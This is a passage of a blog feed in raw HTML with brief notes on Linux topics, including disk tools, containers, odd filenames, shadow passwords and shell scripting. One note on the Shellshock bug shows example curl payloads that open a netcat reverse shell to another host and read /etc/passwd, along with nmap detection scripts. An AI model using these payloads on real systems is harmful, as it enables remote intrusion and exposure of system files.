style="color:#f92672">=</span>8<span style="color:#f92672">)</span> ioport:f0c0<span style="color:#f92672">(</span>size<span style="color:#f92672">=</span>4<span style="color:#f92672">)</span> ioport:f0b0<span style="color:#f92672">(</span>size<span style="color:#f92672">=</span>8<span style="color:#f92672">)</span> ioport:f0a0<span style="color:#f92672">(</span>size<span style="color:#f92672">=</span>4<span style="color:#f92672">)</span> ioport:f060<span style="color:#f92672">(</span>size<span style="color:#f92672">=</span>32<span style="color:#f92672">)</span> memory:f7e36000-f7e367ff </span></span></code></pre></div><h5 id="smartctl">smartctl</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>dmesg | grep -i scsi </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> 0.210852<span style="color:#f92672">]</span> SCSI subsystem initialized </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> 0.341280<span style="color:#f92672">]</span> Block layer SCSI generic <span style="color:#f92672">(</span>bsg<span style="color:#f92672">)</span> driver version 0.4 loaded <span style="color:#f92672">(</span>major 243<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span>... </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> 1.213299<span style="color:#f92672">]</span> scsi 0:0:0:0: Direct-Access ATA ST320LT012-9WS14 YAM1 PQ: <span style="color:#ae81ff">0</span> ANSI: <span style="color:#ae81ff">5</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> 1.319886<span style="color:#f92672">]</span> sd 0:0:0:0: <span style="color:#f92672">[</span>sda<span style="color:#f92672">]</span> Attached SCSI disk </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> 19.571008<span style="color:#f92672">]</span> sd 0:0:0:0: Attached scsi generic sg0 type <span style="color:#ae81ff">0</span> </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>smartctl --all /dev/sda </span></span><span style="display:flex;"><span>Model Family: Seagate Laptop HDD </span></span><span style="display:flex;"><span>Device Model: ST320LT012-9WS14C </span></span><span style="display:flex;"><span>Serial Number: S0V3R9LL </span></span><span style="display:flex;"><span>LU WWN Device Id: <span style="color:#ae81ff">5</span> 000c50 05be4653c </span></span><span style="display:flex;"><span>Firmware Version: 0001YAM1 </span></span><span style="display:flex;"><span>User Capacity: 320,072,933,376 bytes <span style="color:#f92672">[</span><span style="color:#ae81ff">320</span> GB<span style="color:#f92672">]</span> </span></span><span style="display:flex;"><span>Sector Sizes: <span style="color:#ae81ff">512</span> bytes logical, <span style="color:#ae81ff">4096</span> bytes physical </span></span><span style="display:flex;"><span>Rotation Rate: <span style="color:#ae81ff">5400</span> rpm </span></span><span style="display:flex;"><span>Form Factor: 2.5 inches </span></span><span style="display:flex;"><span>Device is: In smartctl database 7.3/5319 </span></span><span style="display:flex;"><span>ATA Version is: ATA8-ACS T13/1699-D revision <span style="color:#ae81ff">4</span> </span></span><span style="display:flex;"><span>SATA Version is: SATA 2.6, 3.0 Gb/s <span style="color:#f92672">(</span>current: 3.0 Gb/s<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span>Local Time is: Sat Nov <span style="color:#ae81ff">19</span> 20:52:01 <span style="color:#ae81ff">2022</span> PKT </span></span><span style="display:flex;"><span>SMART support is: Available - device has SMART capability. </span></span><span style="display:flex;"><span>SMART support is: Enabled </span></span><span style="display:flex;"><span>... </span></span></code></pre></div><h5 id="megacli">MegaCLI</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>megacli -LDInfo -Lall -aALL </span></span><span style="display:flex;"><span>Adapter <span style="color:#ae81ff">0</span> -- Virtual Drive Information: </span></span><span style="display:flex;"><span>Virtual Drive: <span style="color:#ae81ff">0</span> <span style="color:#f92672">(</span>Target Id: 0<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span>Name : SEAGATE </span></span><span style="display:flex;"><span>RAID Level : Primary-1, Secondary-0, RAID Level Qualifier-0 </span></span><span style="display:flex;"><span>Size : <span style="color:#ae81ff">320</span> GB </span></span><span style="display:flex;"><span>Sector Size : <span style="color:#ae81ff">512</span> </span></span><span style="display:flex;"><span>Mirror Data : <span style="color:#ae81ff">320</span> GB </span></span><span style="display:flex;"><span>State : Optimal </span></span><span style="display:flex;"><span>... </span></span></code></pre></div><h5 id="lsscsi">lsscsi</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>lsscsi </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>0:0:0:0<span style="color:#f92672">]</span> disk ATA ST320LT012-9WS14 YAM1 /dev/sda </span></span></code></pre></div><h5 id="vendor-specific-tools">Vendor-Specific Tools</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>omreport storage vdisk </span></span><span style="display:flex;"><span>List of Virtual Disks in the System </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>Controller SEAGATE Laptop HDD </span></span><span style="display:flex;"><span>ID : <span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span>Status : Ok </span></span><span style="display:flex;"><span>Name : SEAGATE </span></span><span style="display:flex;"><span>State : Ready </span></span><span style="display:flex;"><span>Hot Spare Policy violated : Not Assigned </span></span><span style="display:flex;"><span>Encrypted : No </span></span><span style="display:flex;"><span>Layout : RAID-0 </span></span><span style="display:flex;"><span>Size : 320.00 GB <span style="color:#f92672">(</span><span style="color:#ae81ff">343597383680</span> bytes<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span>T10 Protection Information Status : No </span></span><span style="display:flex;"><span>Associated Fluid Cache State : Not Applicable </span></span><span style="display:flex;"><span>Device Name : /dev/sda </span></span><span style="display:flex;"><span>Bus Protocol : ATA </span></span><span style="display:flex;"><span>Media : HDD </span></span><span style="display:flex;"><span>Read Policy : Adaptive Read Ahead </span></span><span style="display:flex;"><span>Write Policy : Write Back </span></span><span style="display:flex;"><span>Cache Policy : Not Applicable </span></span><span style="display:flex;"><span>Stripe Element Size : <span style="color:#ae81ff">128</span> KB </span></span><span style="display:flex;"><span>Disk Cache Policy : Enabled </span></span></code></pre></div>https://linzeyan.github.io/posts/2022/20221128-linux-shellshock-bug/Mon, 28 Nov 2022 15:35:30 +0800https://linzeyan.github.io/posts/2022/20221128-linux-shellshock-bug/<ul> <li><a href="https://www.baeldung.com/linux/shellshock-bug" target="_blank" rel="noopener">Test Whether a Server Is Vulnerable to Shellshock Bug</a></li> </ul> <h5 id="the-shellshock-bug">The Shellshock Bug</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>env x<span style="color:#f92672">=</span><span style="color:#e6db74">&#39; () {:;};&#39;</span> </span></span></code></pre></div><h5 id="exploiting-shellshock-bug">Exploiting Shellshock Bug</h5> <ul> <li>A substituted command is executed since the feature ignores the command specified by the user, and instead, it runs that which the ForceCommand defines.</li> <li>The ignored commands from the user are put in the &ldquo;SSH_ORIGINAL_COMMAND&rdquo; environment variable. If the user&rsquo;s default shell is Bash, the Bash shell will parse the value of the &ldquo;SSH_ORIGINAL_COMMAND&rdquo; environment variable on start-up and run the embedded commands.</li> </ul> <h5 id="examples-of-shellshock-exploit-commands">Examples of Shellshock Exploit Commands</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">## 1</span> </span></span><span style="display:flex;"><span>curl -H <span style="color:#e6db74">&#34;X-Frame-Options: () {:;};echo;/bin/nc -e /bin/bash 192.168.y.y 443&#34;</span> 192.168.x.y/CGI-bin/hello.cgi </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">## 2</span> </span></span><span style="display:flex;"><span>curl --insecure 192.168.x.x -H <span style="color:#e6db74">&#34;User-Agent: () { :; }; /bin/cat /etc/passwd&#34;</span> </span></span></code></pre></div><ul> <li>use nmap script to test for the vulnerability</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nmap -sV -p- --script http-shellshock 192.168.x.x </span></span><span style="display:flex;"><span>nmap -sV -p- --script http-shellshock --script-args uri<span style="color:#f92672">=</span>/cgi-bin/bin,cmd<span style="color:#f92672">=</span>ls 192.168.x.x </span></span></code></pre></div>https://linzeyan.github.io/posts/2022/20221124-containers-from-scratch/Thu, 24 Nov 2022 13:10:14 +0800https://linzeyan.github.io/posts/2022/20221124-containers-from-scratch/<ul> <li><a href="https://ericchiang.github.io/post/containers-from-scratch/" target="_blank" rel="noopener">Containers from scratch</a></li> </ul> <h3 id="container-file-systems">Container file systems</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ wget https://github.com/ericchiang/containers-from-scratch/releases/download/v0.1.0/rootfs.tar.gz </span></span><span style="display:flex;"><span>$ sha256sum rootfs.tar.gz </span></span><span style="display:flex;"><span>c79bfb46b9cf842055761a49161831aee8f4e667ad9e84ab57ab324a49bc828c rootfs.tar.gz </span></span><span style="display:flex;"><span>$ <span style="color:#75715e"># tar needs sudo to create /dev files and setup file ownership</span> </span></span><span style="display:flex;"><span>$ sudo tar -zxf rootfs.tar.gz </span></span><span style="display:flex;"><span>$ ls rootfs </span></span><span style="display:flex;"><span>bin dev home lib64 mnt proc run srv tmp var </span></span><span style="display:flex;"><span>boot etc lib media opt root sbin sys usr </span></span><span style="display:flex;"><span>$ ls -al rootfs/bin/ls </span></span><span style="display:flex;"><span>-rwxr-xr-x. <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">118280</span> Mar <span style="color:#ae81ff">14</span> <span style="color:#ae81ff">2015</span> rootfs/bin/ls </span></span></code></pre></div><h3 id="chroot">chroot</h3> <p>it allows us to restrict a process&rsquo; view of the file system. In this case, we&rsquo;ll restrict our process to the &ldquo;rootfs&rdquo; directory then exec a shell.</p>https://linzeyan.github.io/posts/2022/20221114-delete-files-non-printable-characters/Mon, 14 Nov 2022 13:55:17 +0800https://linzeyan.github.io/posts/2022/20221114-delete-files-non-printable-characters/<ul> <li><a href="https://www.baeldung.com/linux/delete-files-non-printable-characters" target="_blank" rel="noopener">How to Delete Files With Names That Contain Non-printable Characters</a></li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ls -l </span></span><span style="display:flex;"><span>total <span style="color:#ae81ff">13</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 07:08 <span style="color:#e6db74">&#39; &#39;</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">162</span> Apr <span style="color:#ae81ff">16</span> <span style="color:#ae81ff">2022</span> <span style="color:#e6db74">&#39;~$iscord.docx&#39;</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">6</span> Nov <span style="color:#ae81ff">6</span> 06:03 <span style="color:#e6db74">&#39;&#39;$&#39;\302\226&#39;</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:01 <span style="color:#e6db74">&#39;&#39;$&#39;\302\226&#39;&#39;Λ---ω&#39;</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:13 <span style="color:#e6db74">&#39;␴?␴??␴??::␴?␴&#39;</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:12 ␴__␴ </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:14 ␴␴␴␴␴␴␴␴␴␴␴␴␴␴␴␴␴ </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:18 <span style="color:#e6db74">&#39;␴ω␴␴␣␦&#39;$&#39;\342\220\264&#39;</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:16 ␣␣␣␣␣␣␣␣ </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:26 ␣ μ μ Ω Ω </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">14</span> Nov <span style="color:#ae81ff">6</span> 06:23 <span style="color:#e6db74">&#39;␣ μ ␴&#39;$&#39;\342\220\264&#39;&#39;Ξ&#39;</span> </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:27 </span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:27 </span></span></code></pre></div><h5 id="using-ansi-c-quoting">Using ANSI-C Quoting</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Using ANSI-C Quoting</span> </span></span><span style="display:flex;"><span>rm <span style="color:#e6db74">&#39;&#39;$&#39;\302\226&#39;</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># We can also use the $ special character before enclosing the filename in single quotes</span> </span></span><span style="display:flex;"><span>rm <span style="color:#e6db74">$&#39;\356\200\215&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># pass an item&#39;s name to rm without using the ANSI-C quoting</span> </span></span><span style="display:flex;"><span>rm <span style="color:#e6db74">&#39;\026\033&#39;</span> </span></span><span style="display:flex;"><span>rm: cannot remove <span style="color:#e6db74">&#39;\026\033&#39;</span>: No such file or directory </span></span></code></pre></div><h5 id="using-inode-numbers">Using Inode Numbers</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ls -li </span></span><span style="display:flex;"><span>total <span style="color:#ae81ff">11</span> </span></span><span style="display:flex;"><span>... </span></span><span style="display:flex;"><span><span style="color:#ae81ff">6517085</span> -rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:18 <span style="color:#e6db74">&#39;␴ω␴␴␣␦&#39;$&#39;\342\220\264&#39;</span> </span></span><span style="display:flex;"><span><span style="color:#ae81ff">7826050</span> -rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">3</span> Nov <span style="color:#ae81ff">9</span> 04:23 <span style="color:#e6db74">&#39;&#39;$&#39;\356\200\215\356\200\215\356\200\215&#39;</span> </span></span><span style="display:flex;"><span><span style="color:#ae81ff">4685554</span> -rw-r--r-- <span style="color:#ae81ff">1</span> ZZ <span style="color:#ae81ff">197121</span> <span style="color:#ae81ff">4</span> Nov <span style="color:#ae81ff">6</span> 06:27 </span></span></code></pre></div><p>we can delete the desired file by passing its inode number to the -inum switch of the find command</p>https://linzeyan.github.io/posts/2022/20221114-shadow-passwords/Mon, 14 Nov 2022 12:55:39 +0800https://linzeyan.github.io/posts/2022/20221114-shadow-passwords/<ul> <li><a href="https://www.baeldung.com/linux/shadow-passwords" target="_blank" rel="noopener">/etc/shadow and Creating yescrypt, MD5, SHA-256, and SHA-512 Password Hashes</a></li> </ul> <h5 id="chage-and-password-aging">chage and Password Aging</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>chage --list root </span></span><span style="display:flex;"><span>Last password change : Oct 01, <span style="color:#ae81ff">2022</span> </span></span><span style="display:flex;"><span>Password expires : never </span></span><span style="display:flex;"><span>Password inactive : never </span></span><span style="display:flex;"><span>Account expires : never </span></span><span style="display:flex;"><span>Minimum number of days between password change : <span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span>Maximum number of days between password change : <span style="color:#ae81ff">99999</span> </span></span><span style="display:flex;"><span>Number of days of warning before password expires : <span style="color:#ae81ff">7</span> </span></span></code></pre></div><p>Consequently, we can change any field via its associated flag:</p>https://linzeyan.github.io/posts/2022/20221110-which-on-an-aliased-command/Thu, 10 Nov 2022 16:24:30 +0800https://linzeyan.github.io/posts/2022/20221110-which-on-an-aliased-command/<ul> <li><a href="https://www.baeldung.com/linux/which-on-an-aliased-command" target="_blank" rel="noopener">How to Use which on an Aliased Command</a></li> </ul> <h5 id="type">type</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>type grep </span></span><span style="display:flex;"><span>grep is an alias <span style="color:#66d9ef">for</span> grep --color<span style="color:#f92672">=</span>auto </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Bash&#39;s type</span> </span></span><span style="display:flex;"><span>type -P grep </span></span><span style="display:flex;"><span>/usr/bin/grep </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Zsh&#39;s type</span> </span></span><span style="display:flex;"><span>type -p grep </span></span><span style="display:flex;"><span>grep is /usr/bin/grep </span></span></code></pre></div><h5 id="gnu-which">GNU which</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>which -a which </span></span><span style="display:flex;"><span>which: shell built-in command </span></span><span style="display:flex;"><span>/usr/bin/which </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>alias top10 </span></span><span style="display:flex;"><span>top10<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;print -l ${(o)history%% *} | uniq -c | sort -nr | head -n 10&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>alias | /usr/bin/which -i top10 </span></span><span style="display:flex;"><span>top10<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;print -l ${(o)history%% *} | uniq -c | sort -nr | head -n 10&#39;</span> </span></span><span style="display:flex;"><span> /usr/bin/uniq </span></span><span style="display:flex;"><span> /usr/bin/sort </span></span><span style="display:flex;"><span> /usr/bin/head </span></span></code></pre></div>https://linzeyan.github.io/posts/2022/20221103-shell-script-best-practices/Thu, 03 Nov 2022 16:51:11 +0800https://linzeyan.github.io/posts/2022/20221103-shell-script-best-practices/<ul> <li><a href="https://sharats.me/posts/shell-script-best-practices/" target="_blank" rel="noopener">Shell Script Best Practices</a></li> </ul> <h4 id="things">Things</h4> <ol> <li>Just make the first line be <code>#!/usr/bin/env bash</code>.</li> <li>Use the <code>.sh</code> (or <code>.bash</code>) extension for your file.</li> <li>Use <code>set -o errexit</code> at the start of your script.</li> <li>Prefer to use <code>set -o nounset</code>. <ol> <li>use <code>&quot;${VARNAME-}&quot;</code> instead of <code>&quot;$VARNAME&quot;</code></li> </ol> </li> <li>Use <code>set -o pipefail</code>.</li> <li>Use <code>set -o xtrace</code>, with a check on <code>$TRACE</code> env variable. <ol> <li><code>if [[ &quot;${TRACE-0}&quot; == &quot;1&quot; ]]; then set -o xtrace; fi</code></li> <li>People can now enable debug mode, by running your script as <code>TRACE=1 ./script.sh</code> instead of <code>./script.sh</code>.</li> </ol> </li> <li>Use <code>[[ ]]</code> for conditions in <code>if</code> / <code>while</code> statements, instead of <code>[ ]</code> or <code>test</code>.</li> <li>Always quote variable accesses with double-quotes.</li> <li>Use <code>local</code> variables in functions.</li> <li>When printing error messages, please redirect to stderr. <ol> <li>Use <code>echo 'Something unexpected happened' &gt;&amp;2</code> for this.</li> </ol> </li> <li>Use long options, where possible (like <code>--silent</code> instead of <code>-s</code>).</li> <li>If appropriate, change to the script&rsquo;s directory close to the start of the script. <ol> <li>Use cd &ldquo;$(dirname &ldquo;$0&rdquo;)&rdquo;, which works in most cases.</li> </ol> </li> <li>Use <code>shellcheck</code>. Heed its warnings.</li> </ol> <h4 id="template">Template</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env bash </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> </span></span><span style="display:flex;"><span>set -o errexit </span></span><span style="display:flex;"><span>set -o nounset </span></span><span style="display:flex;"><span>set -o pipefail </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>TRACE-0<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;1&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span> </span></span><span style="display:flex;"><span> set -o xtrace </span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>1-<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span>~ ^-*h<span style="color:#f92672">(</span>elp<span style="color:#f92672">)</span>?$ <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#39;Usage: ./script.sh arg-one arg-two </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">This is an awesome bash script to make your life better. </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> </span></span><span style="display:flex;"><span> exit </span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>cd <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>dirname <span style="color:#e6db74">&#34;</span>$0<span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>main<span style="color:#f92672">()</span> <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> echo <span style="color:#66d9ef">do</span> awesome stuff </span></span><span style="display:flex;"><span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>main <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span> </span></span></code></pre></div>https://linzeyan.github.io/posts/2022/20221102-the-art-of-command-line/Wed, 02 Nov 2022 15:04:37 +0800https://linzeyan.github.io/posts/2022/20221102-the-art-of-command-line/<ul> <li><a href="https://github.com/jlevy/the-art-of-command-line" target="_blank" rel="noopener">The Art of Command Line</a></li> </ul>https://linzeyan.github.io/posts/2022/20221021-shell-printing-ascii-art/Fri, 21 Oct 2022 17:30:41 +0800https://linzeyan.github.io/posts/2022/20221021-shell-printing-ascii-art/<ul> <li><a href="https://www.baeldung.com/linux/shell-printing-ascii-art" target="_blank" rel="noopener">Printing ASCII Art in the Shell</a></li> </ul> <h5 id="banner">banner</h5> <blockquote> <p><code>sudo apt install sysvbanner</code></p></blockquote> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ banner hello </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># # ###### # # ####</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># # # # # # #</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">###### ##### # # # #</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># # # # # # #</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># # # # # # #</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># # ###### ###### ###### ####</span> </span></span></code></pre></div><h5 id="figlet-frank-ian-and-glenns-letters">FIGlet: Frank, Ian, and Glenn&rsquo;s Letters</h5> <blockquote> <p><code>sudo apt install figlet</code></p></blockquote> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ figlet hello </span></span><span style="display:flex;"><span> _ _ _ </span></span><span style="display:flex;"><span>| |__ ___| | | ___ </span></span><span style="display:flex;"><span>| <span style="color:#960050;background-color:#1e0010">&#39;</span>_ <span style="color:#ae81ff">\ </span>/ _ <span style="color:#ae81ff">\ </span>| |/ _ <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>| | | | __/ | | <span style="color:#f92672">(</span>_<span style="color:#f92672">)</span> | </span></span><span style="display:flex;"><span>|_| |_|<span style="color:#ae81ff">\_</span>__|_|_|<span style="color:#ae81ff">\_</span>__/ </span></span></code></pre></div><ul> <li><code>-f</code> option and specify a font name for the output</li> <li><code>-l</code>, <code>-c</code>, and <code>-r</code> options to align the text to the left, center, or right,</li> </ul> <h5 id="toilet-figlet-with-more-options">TOIlet: FIGlet With More Options</h5> <blockquote> <p><code>sudo apt install toilet</code></p>https://linzeyan.github.io/posts/2022/20221021-echo-printf-overwrite-terminal-line/Fri, 21 Oct 2022 17:29:10 +0800https://linzeyan.github.io/posts/2022/20221021-echo-printf-overwrite-terminal-line/<ul> <li><a href="https://www.baeldung.com/linux/echo-printf-overwrite-terminal-line" target="_blank" rel="noopener">How to Make Output Overwrite the Same Line in a Terminal</a></li> </ul> <h5 id="introduction-to-the-problem">Introduction to the Problem</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ cat print_status.sh </span></span><span style="display:flex;"><span>!/bin/bash </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;[INFO] Processing file: readme.txt&#34;</span> </span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">2</span> To simulate the file processing </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;[INFO] Processing file: veryPowerfulService.service&#34;</span> </span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;[INFO] Processing file: log.txt&#34;</span> </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;DONE&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>$ ./print_status.sh </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>INFO<span style="color:#f92672">]</span> Processing file: readme.txt </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>INFO<span style="color:#f92672">]</span> Processing file: veryPowerfulService.service </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>INFO<span style="color:#f92672">]</span> Processing file: log.txt </span></span><span style="display:flex;"><span>DONE </span></span></code></pre></div><h5 